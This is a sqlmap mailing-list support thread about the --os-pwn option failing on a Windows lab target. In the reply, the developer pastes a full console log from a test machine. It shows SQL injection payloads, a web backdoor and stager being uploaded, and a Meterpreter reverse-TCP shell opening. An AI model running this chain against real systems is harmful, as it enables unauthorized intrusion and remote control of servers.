Re: [sqlmap-users] mysql os-pwn options on windows
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] mysql os-pwn options on windows
|
From: Miroslav S. <mir...@gm...> - 2016-04-22 07:17:15
|
In your case, problem is the --tmp-path. Have you manually set it to
"/tmp"? If so, it is wrongly set to a linux path while you should put it to
a remote (Windows) location (...--tmp-path=TMPPATH Remote absolute path of
temporary files directory)
Bye
On Fri, Apr 22, 2016 at 9:13 AM, Miroslav Stampar <
mir...@gm...> wrote:
> $ sudo python sqlmap.py -u "
> http://192.168.146.132/test_environment/mysql/get_int.php?id=1" --os-pwn
> [sudo] password for stamparm:
> _
> ___ ___| |_____ ___ ___ {1.0.4.21#dev}
> |_ -| . | | | .'| . |
> |___|_ |_|_|_|_|__,| _|
> |_| |_| http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 09:11:45
>
> [09:11:45] [WARNING] you did not provide the local path where Metasploit
> Framework is installed
> [09:11:45] [WARNING] sqlmap is going to look for Metasploit Framework
> installation inside the environment path(s)
> [09:11:45] [INFO] Metasploit Framework has been found installed in the
> '/usr/bin' path
> [09:11:45] [INFO] resuming back-end DBMS 'mysql'
> [09:11:45] [INFO] testing connection to the target URL
> [09:11:45] [INFO] heuristics detected web page charset 'ascii'
> [09:11:45] [WARNING] there is a DBMS error found in the HTTP response body
> which could interfere with the results of the tests
> sqlmap resumed the following injection point(s) from stored session:
> ---
> Parameter: id (GET)
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: id=1 AND 2546=2546
>
> Type: error-based
> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
> BY clause
> Payload: id=1 AND (SELECT 8079 FROM(SELECT
> COUNT(*),CONCAT(0x7178767071,(SELECT
> (ELT(8079=8079,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM
> INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
>
> Type: AND/OR time-based blind
> Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
> Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xlBU)
>
> Type: UNION query
> Title: Generic UNION query (NULL) - 3 columns
> Payload: id=1 UNION ALL SELECT
> NULL,NULL,CONCAT(0x7178767071,0x4d456579576479484f6370774b764245666350774a6f544b5a714c6442686644794976654154524a,0x7178767671)--
> epjZ
> ---
> [09:11:45] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows
> web application technology: PHP 5.3.1, Apache 2.2.14
> back-end DBMS: MySQL 5.0
> [09:11:45] [INFO] fingerprinting the back-end DBMS operating system
> [09:11:45] [INFO] the back-end DBMS operating system is Windows
> how do you want to establish the tunnel?
> [1] TCP: Metasploit Framework (default)
> [2] ICMP: icmpsh - ICMP tunneling
> >
> [09:11:46] [INFO] going to use a web backdoor to establish the tunnel
> which web application language does the web server support?
> [1] ASP
> [2] ASPX
> [3] JSP
> [4] PHP (default)
> >
> [09:11:47] [WARNING] unable to retrieve automatically the web server
> document root
> what do you want to use for writable directory?
> [1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)
> [2] custom location(s)
> [3] custom directory list file
> [4] brute force search
> > 1
> [09:12:02] [WARNING] unable to automatically parse any web server path
> [09:12:02] [INFO] trying to upload the file stager on '/xampp/htdocs/' via
> LIMIT 'LINES TERMINATED BY' method
> [09:12:02] [INFO] the file stager has been successfully uploaded on
> '/xampp/htdocs/' - http://192.168.146.132:80/tmpuycdj.php
> [09:12:02] [INFO] the backdoor has been successfully uploaded on
> '/xampp/htdocs/' - http://192.168.146.132:80/tmpbqtzu.php
> [09:12:02] [INFO] creating Metasploit Framework multi-stage shellcode
> which connection type do you want to use?
> [1] Reverse TCP: Connect back from the database host to this machine
> (default)
> [2] Reverse TCP: Try to connect back from the database host to this
> machine, on all ports between the specified and 65535
> [3] Reverse HTTP: Connect back from the database host to this machine
> tunnelling traffic over HTTP
> [4] Reverse HTTPS: Connect back from the database host to this machine
> tunnelling traffic over HTTPS
> [5] Bind TCP: Listen on the database host for a connection
> >
> what is the local address? [Enter for '192.168.146.1' (detected)]
> which local port number do you want to use? [59643]
> which payload do you want to use?
> [1] Meterpreter (default)
> [2] Shell
> [3] VNC
> >
> [09:12:04] [INFO] creation in progress ..... done
> [09:12:09] [INFO] uploading shellcodeexec to
> 'C:/Windows/Temp/tmpsehply.exe'
> [09:12:09] [INFO] shellcodeexec successfully uploaded
> [09:12:09] [INFO] running Metasploit Framework command line interface
> locally, please wait..
>
>
> ______________________________________________________________________________
> |
> |
> | METASPLOIT CYBER MISSILE COMMAND V4
> |
>
> |______________________________________________________________________________|
> \ / /
> \ . / /
> x
> \ / /
> \ / + /
> \ + / /
> * / /
> / . /
> X / / X
> / ###
> / # % #
> / ###
> . /
> . / . * .
> /
> *
> + *
>
> ^
> #### __ __ __ ####### __ __ __
> ####
> #### / \ / \ / \ ########### / \ / \ / \
> ####
>
> ################################################################################
>
> ################################################################################
> # WAVE 4 ######## SCORE 31337 ################################## HIGH
> FFFFFFFF #
>
> ################################################################################
>
> http://metasploit.pro
>
>
> =[ metasploit v4.11.8-dev-a030179 ]
> + -- --=[ 1527 exploits - 880 auxiliary - 259 post ]
> + -- --=[ 437 payloads - 38 encoders - 8 nops ]
> + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
>
> PAYLOAD => windows/meterpreter/reverse_tcp
> EXITFUNC => process
> LPORT => 59643
> LHOST => 192.168.146.1
> [*] Started reverse TCP handler on 192.168.146.1:59643
> [*] Starting the payload handler...
> [09:12:18] [INFO] running Metasploit Framework shellcode remotely via
> shellcodeexec, please wait..
> [09:12:23] [WARNING] turning off pre-connect mechanism because of
> connection time out(s)
> [*] Sending stage (957487 bytes) to 192.168.146.132
>
> meterpreter >
>
>
> On Fri, Apr 22, 2016 at 6:56 AM, Indra Zulkarnain <net...@gm...>
> wrote:
>
>> hi all,
>>
>> i just wondering, when i tried to do --os-pwn on sqlmap in my "DVWA
>> windows machine"
>>
>> i got an error
>>
>> [WARNING] unable to upload the file through the web file stager to '/tmp'
>>
>> i wonder is it only avaliable for linux OS ?
>>
>> thanks
>> Indra Z
>>
>> --
>> --from the net with zero space--
>>
>>
>> ------------------------------------------------------------------------------
>> Find and fix application performance issues faster with Applications
>> Manager
>> Applications Manager provides deep performance insights into multiple
>> tiers of
>> your business applications. It resolves application problems quickly and
>> reduces your MTTR. Get your free trial!
>> https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
--
Miroslav Stampar
http://about.me/stamparm
|
